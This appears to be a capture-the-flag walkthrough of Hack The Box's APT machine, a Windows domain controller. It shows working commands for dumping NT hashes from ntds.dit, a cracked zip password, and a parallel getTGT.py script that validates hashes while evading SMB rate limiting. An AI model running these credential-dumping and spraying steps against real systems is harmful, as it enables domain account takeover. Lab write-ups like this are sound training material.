This post documents the complete walkthrough of APT, a retired vulnerable VM created by cube0x0, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.

Background

APT is a retired vulnerable VM from Hack The Box.

Information Gathering

Let’s start with a masscan probe to establish the open ports in the host.

masscan -e tun0 -p1-65535,U:1-65535 10.10.10.213 --rate=500

Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-11-04 03:11:21 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 80/tcp on 10.10.10.213
Discovered open port 135/tcp on 10.10.10.213

Hmm. This is a shit-show. Let’s do one better with nmap scanning the discovered ports to establish their services.

nmap -n -v -Pn -p80,135 -A --reason 10.10.10.213 -oN nmap.txt
...
PORT    STATE SERVICE REASON          VERSION
80/tcp  open  http    syn-ack ttl 127 Microsoft IIS httpd 10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Gigantic Hosting | Home
135/tcp open  msrpc   syn-ack ttl 127 Microsoft Windows RPC

Wow. This doesn’t look good. Anyway, this is what the http service looks like.

This is a shit show.

Impacket’s rpcdump.py

Well, RPC is available. We can use Impacket’s rpcdump.py to dump the RPC endpoints exposed by the machine like so.

python3 rpcdump.py '':''@10.10.10.213
Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Retrieving endpoint list from 10.10.10.213
Protocol: [MS-RSP]: Remote Shutdown Protocol
Provider: wininit.exe
UUID    : D95AFE70-A6D5-4259-822E-2C84DA1DDB0D v1.0
Bindings:
          ncacn_ip_tcp:10.10.10.213[49664]
          ncalrpc:[WindowsShutdown]
          ncacn_np:\\APT[\PIPE\InitShutdown]
          ncalrpc:[WMsgKRpc06C750]

Protocol: N/A
Provider: winlogon.exe
UUID    : 76F226C3-EC14-4325-8A99-6A46348418AF v1.0
Bindings:
          ncalrpc:[WindowsShutdown]
          ncacn_np:\\APT[\PIPE\InitShutdown]
          ncalrpc:[WMsgKRpc06C750]
          ncalrpc:[WMsgKRpc06DBE1]

Protocol: N/A
Provider: N/A
UUID    : D09BDEB5-6171-4A34-BFE2-06FA82652568 v1.0
Bindings:
          ncalrpc:[csebpub]
          ncalrpc:[LRPC-32d08a7a25006c9ab9]
          ncalrpc:[LRPC-2e47ec8337f8d73192]
          ncacn_np:\\APT[\pipe\LSM_API_service]
          ncalrpc:[LSMApi]
          ncalrpc:[LRPC-a9f28d933cdafd8836]
          ncalrpc:[actkernel]
          ncalrpc:[umpo]
          ncalrpc:[LRPC-2e47ec8337f8d73192]
          ncacn_np:\\APT[\pipe\LSM_API_service]
          ncalrpc:[LSMApi]
          ncalrpc:[LRPC-a9f28d933cdafd8836]
          ncalrpc:[actkernel]
          ncalrpc:[umpo]
          ncalrpc:[LRPC-8e203c65260f07617f]
          ncalrpc:[dhcpcsvc]
          ncalrpc:[dhcpcsvc6]
          ncacn_ip_tcp:10.10.10.213[49665]
          ncacn_np:\\APT[\pipe\eventlog]
          ncalrpc:[eventlog]
          ncalrpc:[LRPC-f862ae1c95724bc114]

Protocol: N/A
Provider: N/A
UUID    : 697DCDA9-3BA9-4EB2-9247-E11F1901B0D2 v1.0
Bindings:
          ncalrpc:[LRPC-32d08a7a25006c9ab9]
          ncalrpc:[LRPC-2e47ec8337f8d73192]
          ncacn_np:\\APT[\pipe\LSM_API_service]
          ncalrpc:[LSMApi]
          ncalrpc:[LRPC-a9f28d933cdafd8836]
          ncalrpc:[actkernel]
          ncalrpc:[umpo]

Protocol: N/A
Provider: sysntfy.dll
UUID    : C9AC6DB5-82B7-4E55-AE8A-E464ED7B4277 v1.0 Impl friendly name
Bindings:
          ncalrpc:[LRPC-a9f28d933cdafd8836]
          ncalrpc:[actkernel]
          ncalrpc:[umpo]
          ncalrpc:[senssvc]
          ncalrpc:[OLEA48D75D31043A0C7E17591EAD154]
          ncalrpc:[IUserProfile2]
          ncalrpc:[IUserProfile2]
          ncalrpc:[LRPC-3da9aaffe7db740971]
          ncalrpc:[OLEC35BA1645BBC17CD9360FB1976CA]
          ncacn_ip_tcp:10.10.10.213[49667]
          ncalrpc:[samss lpc]
          ncalrpc:[SidKey Local End Point]
          ncalrpc:[protected_storage]
          ncalrpc:[lsasspirpc]
          ncalrpc:[lsapolicylookup]
          ncalrpc:[LSA_EAS_ENDPOINT]
          ncalrpc:[lsacap]
          ncalrpc:[LSARPC_ENDPOINT]
          ncalrpc:[securityevent]
          ncalrpc:[audit]
          ncacn_np:\\APT[\pipe\lsass]

Protocol: N/A
Provider: nsisvc.dll
UUID    : 7EA70BCF-48AF-4F6A-8968-6A440754D5FA v1.0 NSI server endpoint
Bindings:
          ncalrpc:[LRPC-9fa64a3c69f791b7ed]

Protocol: N/A
Provider: N/A
UUID    : A500D4C6-0DD1-4543-BC0C-D5F93486EAF8 v1.0
Bindings:
          ncalrpc:[LRPC-e13da139634e22ad78]
          ncalrpc:[LRPC-8e203c65260f07617f]
          ncalrpc:[dhcpcsvc]
          ncalrpc:[dhcpcsvc6]
          ncacn_ip_tcp:10.10.10.213[49665]
          ncacn_np:\\APT[\pipe\eventlog]
          ncalrpc:[eventlog]
          ncalrpc:[LRPC-f862ae1c95724bc114]

Protocol: N/A
Provider: dhcpcsvc.dll
UUID    : 3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D5 v1.0 DHCP Client LRPC Endpoint
Bindings:
          ncalrpc:[dhcpcsvc]
          ncalrpc:[dhcpcsvc6]
          ncacn_ip_tcp:10.10.10.213[49665]
          ncacn_np:\\APT[\pipe\eventlog]
          ncalrpc:[eventlog]
          ncalrpc:[LRPC-f862ae1c95724bc114]

Protocol: N/A
Provider: dhcpcsvc6.dll
UUID    : 3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D6 v1.0 DHCPv6 Client LRPC Endpoint
Bindings:
          ncalrpc:[dhcpcsvc6]
          ncacn_ip_tcp:10.10.10.213[49665]
          ncacn_np:\\APT[\pipe\eventlog]
          ncalrpc:[eventlog]
          ncalrpc:[LRPC-f862ae1c95724bc114]

Protocol: [MS-EVEN6]: EventLog Remoting Protocol
Provider: wevtsvc.dll
UUID    : F6BEAFF7-1E19-4FBB-9F8F-B89E2018337C v1.0 Event log TCPIP
Bindings:
          ncacn_ip_tcp:10.10.10.213[49665]
          ncacn_np:\\APT[\pipe\eventlog]
          ncalrpc:[eventlog]
          ncalrpc:[LRPC-f862ae1c95724bc114]

Protocol: N/A
Provider: nrpsrv.dll
UUID    : 30ADC50C-5CBC-46CE-9A0E-91914789E23C v1.0 NRP server endpoint
Bindings:
          ncalrpc:[LRPC-f862ae1c95724bc114]

Protocol: N/A
Provider: IKEEXT.DLL
UUID    : A398E520-D59A-4BDD-AA7A-3C1E0303A511 v1.0 IKE/Authip API
Bindings:
          ncalrpc:[LRPC-ac53b3c8af4f316349]
          ncacn_ip_tcp:10.10.10.213[49666]
          ncalrpc:[ubpmtaskhostchannel]
          ncacn_np:\\APT[\PIPE\atsvc]
          ncalrpc:[senssvc]
          ncalrpc:[OLEA48D75D31043A0C7E17591EAD154]
          ncalrpc:[IUserProfile2]

Protocol: N/A
Provider: N/A
UUID    : 0D3C7F20-1C8D-4654-A1B3-51563B298BDA v1.0 UserMgrCli
Bindings:
          ncalrpc:[LRPC-ac53b3c8af4f316349]
          ncacn_ip_tcp:10.10.10.213[49666]
          ncalrpc:[ubpmtaskhostchannel]
          ncacn_np:\\APT[\PIPE\atsvc]
          ncalrpc:[senssvc]
          ncalrpc:[OLEA48D75D31043A0C7E17591EAD154]
          ncalrpc:[IUserProfile2]

Protocol: N/A
Provider: N/A
UUID    : B18FBAB6-56F8-4702-84E0-41053293A869 v1.0 UserMgrCli
Bindings:
          ncalrpc:[LRPC-ac53b3c8af4f316349]
          ncacn_ip_tcp:10.10.10.213[49666]
          ncalrpc:[ubpmtaskhostchannel]
          ncacn_np:\\APT[\PIPE\atsvc]
          ncalrpc:[senssvc]
          ncalrpc:[OLEA48D75D31043A0C7E17591EAD154]
          ncalrpc:[IUserProfile2]

Protocol: N/A
Provider: N/A
UUID    : 3A9EF155-691D-4449-8D05-09AD57031823 v1.0
Bindings:
          ncacn_ip_tcp:10.10.10.213[49666]
          ncalrpc:[ubpmtaskhostchannel]
          ncacn_np:\\APT[\PIPE\atsvc]
          ncalrpc:[senssvc]
          ncalrpc:[OLEA48D75D31043A0C7E17591EAD154]
          ncalrpc:[IUserProfile2]

Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol
Provider: schedsvc.dll
UUID    : 86D35949-83C9-4044-B424-DB363231FD0C v1.0
Bindings:
          ncacn_ip_tcp:10.10.10.213[49666]
          ncalrpc:[ubpmtaskhostchannel]
          ncacn_np:\\APT[\PIPE\atsvc]
          ncalrpc:[senssvc]
          ncalrpc:[OLEA48D75D31043A0C7E17591EAD154]
          ncalrpc:[IUserProfile2]

Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol
Provider: taskcomp.dll
UUID    : 378E52B0-C0A9-11CF-822D-00AA0051E40F v1.0
Bindings:
          ncacn_np:\\APT[\PIPE\atsvc]
          ncalrpc:[senssvc]
          ncalrpc:[OLEA48D75D31043A0C7E17591EAD154]
          ncalrpc:[IUserProfile2]

Protocol: [MS-TSCH]: Task Scheduler Service Remoting Protocol
Provider: taskcomp.dll
UUID    : 1FF70682-0A51-30E8-076D-740BE8CEE98B v1.0
Bindings:
          ncacn_np:\\APT[\PIPE\atsvc]
          ncalrpc:[senssvc]
          ncalrpc:[OLEA48D75D31043A0C7E17591EAD154]
          ncalrpc:[IUserProfile2]

Protocol: N/A
Provider: schedsvc.dll
UUID    : 0A74EF1C-41A4-4E06-83AE-DC74FB1CDD53 v1.0
Bindings:
          ncalrpc:[senssvc]
          ncalrpc:[OLEA48D75D31043A0C7E17591EAD154]
          ncalrpc:[IUserProfile2]

Protocol: N/A
Provider: gpsvc.dll
UUID    : 2EB08E3E-639F-4FBA-97B1-14F878961076 v1.0 Group Policy RPC Interface
Bindings:
          ncalrpc:[LRPC-6c7d79b2be7a33160e]

Protocol: N/A
Provider: N/A
UUID    : DF4DF73A-C52D-4E3A-8003-8437FDF8302A v0.0 WM_WindowManagerRPC\Server
Bindings:
          ncalrpc:[LRPC-90cce070a31859619f]
          ncalrpc:[LRPC-007884fa2b991a56a3]
          ncalrpc:[LRPC-2c6ceae6197a1d5448]

Protocol: N/A
Provider: MPSSVC.dll
UUID    : 2FB92682-6599-42DC-AE13-BD2CA89BD11C v1.0 Fw APIs
Bindings:
          ncalrpc:[LRPC-007884fa2b991a56a3]
          ncalrpc:[LRPC-2c6ceae6197a1d5448]

Protocol: N/A
Provider: N/A
UUID    : F47433C3-3E9D-4157-AAD4-83AA1F5C2D4C v1.0 Fw APIs
Bindings:
          ncalrpc:[LRPC-007884fa2b991a56a3]
          ncalrpc:[LRPC-2c6ceae6197a1d5448]

Protocol: N/A
Provider: MPSSVC.dll
UUID    : 7F9D11BF-7FB9-436B-A812-B2D50C5D4C03 v1.0 Fw APIs
Bindings:
          ncalrpc:[LRPC-007884fa2b991a56a3]
          ncalrpc:[LRPC-2c6ceae6197a1d5448]

Protocol: N/A
Provider: BFE.DLL
UUID    : DD490425-5325-4565-B774-7E27D6C09C24 v1.0 Base Firewall Engine API
Bindings:
          ncalrpc:[LRPC-2c6ceae6197a1d5448]

Protocol: N/A
Provider: N/A
UUID    : 7F1343FE-50A9-4927-A778-0C5859517BAC v1.0 DfsDs service
Bindings:
          ncacn_np:\\APT[\PIPE\wkssvc]
          ncalrpc:[LRPC-0c574d6cbe9e5c6898]
          ncalrpc:[DNSResolver]

Protocol: N/A
Provider: N/A
UUID    : EB081A0D-10EE-478A-A1DD-50995283E7A8 v3.0 Witness Client Test Interface
Bindings:
          ncalrpc:[LRPC-0c574d6cbe9e5c6898]
          ncalrpc:[DNSResolver]

Protocol: N/A
Provider: N/A
UUID    : F2C9B409-C1C9-4100-8639-D8AB1486694A v1.0 Witness Client Upcall Server
Bindings:
          ncalrpc:[LRPC-0c574d6cbe9e5c6898]
          ncalrpc:[DNSResolver]

Protocol: [MS-NRPC]: Netlogon Remote Protocol
Provider: netlogon.dll
UUID    : 12345678-1234-ABCD-EF00-01234567CFFB v1.0
Bindings:
          ncalrpc:[NETLOGON_LRPC]
          ncacn_ip_tcp:10.10.10.213[49670]
          ncacn_np:\\APT[\pipe\5422789cfb897572]
          ncacn_http:10.10.10.213[49669]
          ncalrpc:[NTDS_LPC]
          ncalrpc:[OLEC35BA1645BBC17CD9360FB1976CA]
          ncacn_ip_tcp:10.10.10.213[49667]
          ncalrpc:[samss lpc]
          ncalrpc:[SidKey Local End Point]
          ncalrpc:[protected_storage]
          ncalrpc:[lsasspirpc]
          ncalrpc:[lsapolicylookup]
          ncalrpc:[LSA_EAS_ENDPOINT]
          ncalrpc:[lsacap]
          ncalrpc:[LSARPC_ENDPOINT]
          ncalrpc:[securityevent]
          ncalrpc:[audit]
          ncacn_np:\\APT[\pipe\lsass]

Protocol: [MS-RAA]: Remote Authorization API Protocol
Provider: N/A
UUID    : 0B1C2170-5732-4E0E-8CD3-D9B16F3B84D7 v0.0 RemoteAccessCheck
Bindings:
          ncalrpc:[NETLOGON_LRPC]
          ncacn_ip_tcp:10.10.10.213[49670]
          ncacn_np:\\APT[\pipe\5422789cfb897572]
          ncacn_http:10.10.10.213[49669]
          ncalrpc:[NTDS_LPC]
          ncalrpc:[OLEC35BA1645BBC17CD9360FB1976CA]
          ncacn_ip_tcp:10.10.10.213[49667]
          ncalrpc:[samss lpc]
          ncalrpc:[SidKey Local End Point]
          ncalrpc:[protected_storage]
          ncalrpc:[lsasspirpc]
          ncalrpc:[lsapolicylookup]
          ncalrpc:[LSA_EAS_ENDPOINT]
          ncalrpc:[lsacap]
          ncalrpc:[LSARPC_ENDPOINT]
          ncalrpc:[securityevent]
          ncalrpc:[audit]
          ncacn_np:\\APT[\pipe\lsass]
          ncalrpc:[NETLOGON_LRPC]
          ncacn_ip_tcp:10.10.10.213[49670]
          ncacn_np:\\APT[\pipe\5422789cfb897572]
          ncacn_http:10.10.10.213[49669]
          ncalrpc:[NTDS_LPC]
          ncalrpc:[OLEC35BA1645BBC17CD9360FB1976CA]
          ncacn_ip_tcp:10.10.10.213[49667]
          ncalrpc:[samss lpc]
          ncalrpc:[SidKey Local End Point]
          ncalrpc:[protected_storage]
          ncalrpc:[lsasspirpc]
          ncalrpc:[lsapolicylookup]
          ncalrpc:[LSA_EAS_ENDPOINT]
          ncalrpc:[lsacap]
          ncalrpc:[LSARPC_ENDPOINT]
          ncalrpc:[securityevent]
          ncalrpc:[audit]
          ncacn_np:\\APT[\pipe\lsass]

Protocol: N/A
Provider: efssvc.dll
UUID    : 04EEB297-CBF4-466B-8A2A-BFD6A2F10BBA v1.0 EFSK RPC Interface
Bindings:
          ncacn_np:\\APT[\pipe\efsrpc]
          ncalrpc:[LRPC-8603e9d2516af20382]

Protocol: N/A
Provider: efssvc.dll
UUID    : DF1941C5-FE89-4E79-BF10-463657ACF44D v1.0 EFS RPC Interface
Bindings:
          ncacn_np:\\APT[\pipe\efsrpc]
          ncalrpc:[LRPC-8603e9d2516af20382]

Protocol: [MS-LSAT]: Local Security Authority (Translation Methods) Remote
Provider: lsasrv.dll
UUID    : 12345778-1234-ABCD-EF00-0123456789AB v0.0
Bindings:
          ncacn_ip_tcp:10.10.10.213[49670]
          ncacn_np:\\APT[\pipe\5422789cfb897572]
          ncacn_http:10.10.10.213[49669]
          ncalrpc:[NTDS_LPC]
          ncalrpc:[OLEC35BA1645BBC17CD9360FB1976CA]
          ncacn_ip_tcp:10.10.10.213[49667]
          ncalrpc:[samss lpc]
          ncalrpc:[SidKey Local End Point]
          ncalrpc:[protected_storage]
          ncalrpc:[lsasspirpc]
          ncalrpc:[lsapolicylookup]
          ncalrpc:[LSA_EAS_ENDPOINT]
          ncalrpc:[lsacap]
          ncalrpc:[LSARPC_ENDPOINT]
          ncalrpc:[securityevent]
          ncalrpc:[audit]
          ncacn_np:\\APT[\pipe\lsass]

Protocol: [MS-SAMR]: Security Account Manager (SAM) Remote Protocol
Provider: samsrv.dll
UUID    : 12345778-1234-ABCD-EF00-0123456789AC v1.0
Bindings:
          ncacn_ip_tcp:10.10.10.213[49670]
          ncacn_np:\\APT[\pipe\5422789cfb897572]
          ncacn_http:10.10.10.213[49669]
          ncalrpc:[NTDS_LPC]
          ncalrpc:[OLEC35BA1645BBC17CD9360FB1976CA]
          ncacn_ip_tcp:10.10.10.213[49667]
          ncalrpc:[samss lpc]
          ncalrpc:[SidKey Local End Point]
          ncalrpc:[protected_storage]
          ncalrpc:[lsasspirpc]
          ncalrpc:[lsapolicylookup]
          ncalrpc:[LSA_EAS_ENDPOINT]
          ncalrpc:[lsacap]
          ncalrpc:[LSARPC_ENDPOINT]
          ncalrpc:[securityevent]
          ncalrpc:[audit]
          ncacn_np:\\APT[\pipe\lsass]

Protocol: [MS-DRSR]: Directory Replication Service (DRS) Remote Protocol
Provider: ntdsai.dll
UUID    : E3514235-4B06-11D1-AB04-00C04FC2DCD2 v4.0 MS NT Directory DRS Interface
Bindings:
          ncacn_np:\\APT[\pipe\5422789cfb897572]
          ncacn_http:10.10.10.213[49669]
          ncalrpc:[NTDS_LPC]
          ncalrpc:[OLEC35BA1645BBC17CD9360FB1976CA]
          ncacn_ip_tcp:10.10.10.213[49667]
          ncalrpc:[samss lpc]
          ncalrpc:[SidKey Local End Point]
          ncalrpc:[protected_storage]
          ncalrpc:[lsasspirpc]
          ncalrpc:[lsapolicylookup]
          ncalrpc:[LSA_EAS_ENDPOINT]
          ncalrpc:[lsacap]
          ncalrpc:[LSARPC_ENDPOINT]
          ncalrpc:[securityevent]
          ncalrpc:[audit]
          ncacn_np:\\APT[\pipe\lsass]

Protocol: N/A
Provider: N/A
UUID    : 1A0D010F-1C33-432C-B0F5-8CF4E8053099 v1.0 IdSegSrv service
Bindings:
          ncalrpc:[LRPC-e8534655f126889ae9]

Protocol: N/A
Provider: srvsvc.dll
UUID    : 98716D03-89AC-44C7-BB8C-285824E51C4A v1.0 XactSrv service
Bindings:
          ncalrpc:[LRPC-e8534655f126889ae9]

Protocol: N/A
Provider: N/A
UUID    : E38F5360-8572-473E-B696-1B46873BEEAB v1.0
Bindings:
          ncalrpc:[LRPC-4054c90e503a13cdfc]

Protocol: N/A
Provider: N/A
UUID    : 4C9DBF19-D39E-4BB9-90EE-8F7179B20283 v1.0
Bindings:
          ncalrpc:[LRPC-4054c90e503a13cdfc]

Protocol: [MS-SCMR]: Service Control Manager Remote Protocol
Provider: services.exe
UUID    : 367ABB81-9844-35F1-AD32-98F038001003 v2.0
Bindings:
          ncacn_ip_tcp:10.10.10.213[49673]

Protocol: N/A
Provider: winlogon.exe
UUID    : 12E65DD8-887F-41EF-91BF-8D816C42C2E7 v1.0 Secure Desktop LRPC interface
Bindings:
          ncalrpc:[WMsgKRpc06DBE1]

Protocol: [MS-CMPO]: MSDTC Connection Manager:
Provider: msdtcprx.dll
UUID    : 906B0CE0-C70B-1067-B317-00DD010662DA v1.0
Bindings:
          ncalrpc:[LRPC-d4cce6c99a9b6e742e]
          ncalrpc:[OLE37A39A6B0ABD8CD64BE6C24928B3]
          ncalrpc:[LRPC-1db486f3967af7cd6d]
          ncalrpc:[LRPC-1db486f3967af7cd6d]
          ncalrpc:[LRPC-1db486f3967af7cd6d]

Protocol: [MS-DNSP]: Domain Name Service (DNS) Server Management
Provider: dns.exe
UUID    : 50ABC2A4-574D-40B3-9D66-EE4FD5FBA076 v5.0
Bindings:
          ncacn_ip_tcp:10.10.10.213[49686]

Protocol: [MS-FRS2]: Distributed File System Replication Protocol
Provider: dfsrmig.exe
UUID    : 897E2E5F-93F3-4376-9C9C-FD2277495C27 v1.0 Frs2 Service
Bindings:
          ncacn_ip_tcp:10.10.10.213[52230]
          ncalrpc:[OLED73226644DDC7E67AA397986A093]

[*] Received 266 endpoints.

Looks like IPv6 is in use, judging from 3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D6 v1.0 DHCPv6 Client LRPC Endpoint. Perhaps we can leak the IPv6 address with the IOXIDResolver interface as documented here?

Sweet. Let’s run nmap again, this time targeting the IPv6 addresses. We can choose any of the dead:beef addresses.

nmap -6 -n -v -Pn -p- -T5 -A --reason dead:beef::b885:d62a:d679:573f -oN nmap6.txt
...
PORT      STATE SERVICE      REASON         VERSION
53/tcp    open  domain       syn-ack ttl 63 Simple DNS Plus
80/tcp    open  http         syn-ack ttl 63 Microsoft IIS httpd 10.0
| http-server-header:
|   Microsoft-HTTPAPI/2.0
|_  Microsoft-IIS/10.0
|_http-title: Bad Request
88/tcp    open  kerberos-sec syn-ack ttl 63 Microsoft Windows Kerberos (server time: 2020-11-27 07:08:21Z)
135/tcp   open  msrpc        syn-ack ttl 63 Microsoft Windows RPC
389/tcp   open  ldap         syn-ack ttl 63 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Issuer: commonName=apt.htb.local
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-09-24T07:07:18
| Not valid after:  2050-09-24T07:17:18
| MD5:   c743 dd92 e928 50b0 aa86 6f80 1b04 4d22
|_SHA-1: f677 c290 98c0 2ac5 8575 7060 683d cdbc 5f86 5d45
|_ssl-date: 2020-11-27T07:09:27+00:00; 0s from scanner time.
445/tcp   open  microsoft-ds syn-ack ttl 63 Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?    syn-ack ttl 63
593/tcp   open  ncacn_http   syn-ack ttl 63 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap     syn-ack ttl 63 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Issuer: commonName=apt.htb.local
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-09-24T07:07:18
| Not valid after:  2050-09-24T07:17:18
| MD5:   c743 dd92 e928 50b0 aa86 6f80 1b04 4d22
|_SHA-1: f677 c290 98c0 2ac5 8575 7060 683d cdbc 5f86 5d45
|_ssl-date: 2020-11-27T07:09:27+00:00; 0s from scanner time.
3268/tcp  open  ldap         syn-ack ttl 63 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Issuer: commonName=apt.htb.local
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-09-24T07:07:18
| Not valid after:  2050-09-24T07:17:18
| MD5:   c743 dd92 e928 50b0 aa86 6f80 1b04 4d22
|_SHA-1: f677 c290 98c0 2ac5 8575 7060 683d cdbc 5f86 5d45
|_ssl-date: 2020-11-27T07:09:27+00:00; 0s from scanner time.
3269/tcp  open  ssl/ldap     syn-ack ttl 63 Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=apt.htb.local
| Subject Alternative Name: DNS:apt.htb.local
| Issuer: commonName=apt.htb.local
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2020-09-24T07:07:18
| Not valid after:  2050-09-24T07:17:18
| MD5:   c743 dd92 e928 50b0 aa86 6f80 1b04 4d22
|_SHA-1: f677 c290 98c0 2ac5 8575 7060 683d cdbc 5f86 5d45
|_ssl-date: 2020-11-27T07:09:27+00:00; 0s from scanner time.
5985/tcp  open  http         syn-ack ttl 63 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
9389/tcp  open  mc-nmf       syn-ack ttl 63 .NET Message Framing
47001/tcp open  http         syn-ack ttl 63 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
49664/tcp open  msrpc        syn-ack ttl 63 Microsoft Windows RPC
49665/tcp open  msrpc        syn-ack ttl 63 Microsoft Windows RPC
49666/tcp open  msrpc        syn-ack ttl 63 Microsoft Windows RPC
49667/tcp open  msrpc        syn-ack ttl 63 Microsoft Windows RPC
49669/tcp open  ncacn_http   syn-ack ttl 63 Microsoft Windows RPC over HTTP 1.0
49670/tcp open  msrpc        syn-ack ttl 63 Microsoft Windows RPC
49673/tcp open  msrpc        syn-ack ttl 63 Microsoft Windows RPC
49689/tcp open  msrpc        syn-ack ttl 63 Microsoft Windows RPC
57767/tcp open  msrpc        syn-ack ttl 63 Microsoft Windows RPC

Now, this is a better representation of the remote machine. Looks like we have a Windows server, in fact a domain controller for htb.local judging by the Kerberos, LDAP and DNS services. I’d better add the IPv6 address to /etc/hosts and map it to the host names.

/etc/hosts
dead:beef::b885:d62a:d679:573f  apt apt.htb apt.htb.local htb htb.local

SMB Enumeration

Let’s see what we can find with the good ol’ smbclient like so.

Now let’s see what’s inside backup.

Well well well, what have we here?

Really? Just as I expected, it’s not that simple. The file backup.zip is password-protected but nothing JtR can’t crack.

The password is iloveyousomuch.

Impacket’s secretsdump.py

Armed with the SECURITY and SYSTEM hives (and ntds.dit) from the backup, we can make use of Impacket’s secretsdump.py to dump out the NT hashes of the users in the Active Directory like so.

python3 secretsdump.py -security SECURITY -system SYSTEM -ntds ntds.dit LOCAL > dump

Long story short, there are 2,000 users in the Active Directory. We need to split the dump into usernames and NT hashes for credential validation, for lack of a better term.

sed '24,2023!d' dump > ntlm
cut -d':' -f1 ntlm > usernames
cut -d':' -f4 ntlm > nthashes

With that, it’s just a matter of using CrackMapExec to validate the hashes, i.e. match each NT hash to the correct username. However, there’s a minor problem: CrackMapExec doesn’t do IPv6, and there seems to be a rate-limiting mechanism in place over at 445/tcp (SMB/CIFS) that prevents scripting rpcclient or using CrackMapExec for mass, automated validation.

Impacket’s getTGT.py

Well, we can still use Impacket’s getTGT.py for validation. In short, getTGT.py contacts the Key Distribution Center (KDC) over at 88/tcp to request a Ticket Granting Ticket (TGT) for the username and NT hash we provide as input. If the credentials are correct, the TGT is cached to a file. Otherwise, an error message is displayed. Perfect for scripting, and it sidesteps the rate-limiting mechanism on SMB.

Combined with GNU Parallel, we get a very efficient credential-validation tool.

validate.sh
#!/bin/bash
# Usage: ./validate.sh <threads> <username> <file-of-nt-hashes>
# Tries one username against every NT hash in the file via getTGT.py,
# which is assumed to be in the current directory.

THREAD=$1

# GNU Parallel is a perl program: killing every perl process stops the whole
# run (including an outer parallel instance) as soon as a hit is found.
function die() {
    killall perl 2>/dev/null
}
export -f die

function check() {
    local user=$1
    local hash=$2
    local domain=htb.local
    local host=apt.htb.local

    # Ask the KDC for a TGT and keep only the last line of getTGT.py's output:
    # a "Saving ticket" line on success, a KDC_ERR_* message otherwise.
    local mesg
    mesg=$(python3 getTGT.py "${domain}/${user}@${host}" -hashes ":${hash}" 2>&1 | sed '$!d')

    # Empty output is not a hit; only a non-error last line counts.
    if [[ -n "$mesg" ]] && ! grep -Eq '(KDC_ERR|invalid)' <<<"$mesg"; then
        echo "[+] Username is $user, NT Hash is $hash"
        die
    else
        echo "$mesg"
    fi
}
export -f check

# $2 is a single username, $3 is a file of NT hashes (one per line).
parallel -q -j"$THREAD" check ::: "$2" :::: "$3" 2>/dev/null

We can also run a second GNU Parallel instance on top of it for a divide-and-conquer strategy: with the NT hashes split into chunk files (nthashes_*), each validate.sh invocation handles one username against one chunk.

time parallel -j10 ./validate.sh 4 :::: usernames ::: ./backup/nthashes_* 2>/dev/null | tee gotcha.txt

Not too shabby considering the sheer number of validations (~4M) performed.

Long story short, the valid username is henry.vinson and the valid NT hash is e53d87d42adaa3ca32bdb34a876cbffb. Before we proceed further, we should point KRB5CCNAME to henry.vinson.ccache to reuse the ticket with other Impacket tools.

Enumeration with rpcclient

Armed with valid credentials, we can finally enumerate the Active Directory with rpcclient. I’m particularly interested in the following information:

  1. Other domain users
  2. Domain password policy
  3. Members of the builtin group Remote Management Users

The resulting information will help us determine our next steps.

Domain Users

rpcclient -Uhenry.vinson%e53d87d42adaa3ca32bdb34a876cbffb --pw-nt-hash -c enumdomusers apt.htb.local
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[henry.vinson] rid:[0x451]
user:[henry.vinson_adm] rid:[0x452]

Looks like henry.vinson has another, more privileged account!

Domain password policy

rpcclient -Uhenry.vinson%e53d87d42adaa3ca32bdb34a876cbffb --pw-nt-hash -c "getusrdompwinfo 0x452" apt.htb.local
    &info: struct samr_PwInfo
        min_password_length      : 0x0005 (5)
        password_properties      : 0x00000000 (0)
               0: DOMAIN_PASSWORD_COMPLEX
               0: DOMAIN_PASSWORD_NO_ANON_CHANGE
               0: DOMAIN_PASSWORD_NO_CLEAR_CHANGE
               0: DOMAIN_PASSWORD_LOCKOUT_ADMINS
               0: DOMAIN_PASSWORD_STORE_CLEARTEXT
               0: DOMAIN_REFUSE_PASSWORD_CHANGE

I’ve a bad feeling about this although there’s no complex password policy in place.

Remote Management Users

rpcclient -Uhenry.vinson%e53d87d42adaa3ca32bdb34a876cbffb --pw-nt-hash -c "enumalsgroups builtin" apt.htb.local
group:[Server Operators] rid:[0x225]
